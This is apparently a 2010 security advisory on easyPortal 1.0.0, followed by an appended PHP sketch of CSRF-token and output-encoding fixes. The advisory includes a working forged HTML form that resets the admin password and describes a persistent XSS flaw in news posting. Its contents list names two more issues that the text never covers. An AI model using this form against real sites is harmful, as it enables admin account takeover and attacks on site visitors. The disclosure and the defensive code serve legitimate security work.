[#-----------------------------------------------------------------------------------------------#]
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 02. January 2010.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: easyPortal
[#] Version: 1.0.0
[#] Platform: PHP
[#] Homepage: http://www.eazyportal.com/
[#] Vulnerability: Multiple XSRF Vulnerabilities And Persistent XSS
[#-----------------------------------------------------------------------------------------------#]

[#]Content
|--Change admin password
|--Add news - Persistent XSS
|--Remove private message by id
|--Remove news by id

[*]Change admin password

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://host/" enctype="multipart/form-data" method="post">
<input type="hidden" name="a" value="profile"/>
<input type="hidden" name="uname" value="admin"/>
<input type="hidden" name="uavatar" value=""/>
<input type="hidden" name="uemail" value="e@mail.com"/>
<input type="hidden" name="upwd" value="hacked"/>
<input type="hidden" name="ucpwd" value="hacked"/>
<input type="hidden" name="ulocation" value="moon"/>
<input type="hidden" name="usignature" value="free your mind and the ass will follow"/>
<input type="hidden" name="ushowemail" value="0"/>
<input type="hidden" name="ugmt" value="0"/>
<input type="hidden" name="ufile"/>
<input type="image"
src="http://host/tpl/DefaultGreen/img/button_submit.gif"
name="submit"/>
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[+]Add news - Persistent XSS

http://host/index.php?a=administrator&p=news&s=add

On this page we can add news items that are shown on the main page. The
form is vulnerable to persistent XSS, and an attacker can use this to
infect website visitors.
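
Mitigation sketch for both issues above, added here as an example; it is not code from this advisory or from easyPortal. The function names, the "csrf" field and the session array are assumptions, and the request fields reuse the parameter names from the form above with constructed values.

```php
<?php
// Added example, not easyPortal code. csrf_issue, csrf_check, render_news
// and the "csrf" field name are hypothetical.

// Issue one random token per session; the application embeds it as a hidden
// field in every form that changes state (profile, news, deletions).
function csrf_issue(array &$session): string {
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Accept a state-changing request only if it is a POST that carries the
// token stored in the session. A form hosted on another site cannot read it.
function csrf_check(array $session, string $method, array $post): bool {
    return $method === 'POST'
        && !empty($session['csrf'])
        && isset($post['csrf']) && is_string($post['csrf'])
        && hash_equals($session['csrf'], $post['csrf']);
}

// Encode news fields on output so stored markup is shown as text.
function render_news(string $title, string $body): string {
    $e = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>' . $e($title) . '</h2><p>' . nl2br($e($body)) . '</p>';
}

// Constructed demo input; runs from the PHP CLI.
$session = [];
$token   = csrf_issue($session);

// Cross-site profile request: valid field names, no token, so it is rejected.
$forged = ['a' => 'profile', 'uname' => 'admin', 'upwd' => 'x', 'ucpwd' => 'x'];
var_dump(csrf_check($session, 'POST', $forged));

// The same fields sent from the application's own form, token included.
var_dump(csrf_check($session, 'POST', $forged + ['csrf' => $token]));

// Constructed news item containing markup; the output is inert text.
echo render_news('Update <1.0.1>', '<script>alert(1)</script>'), "\n";
```

Requiring the current password before accepting new upwd/ucpwd values gives the profile form a second check that does not depend on the token.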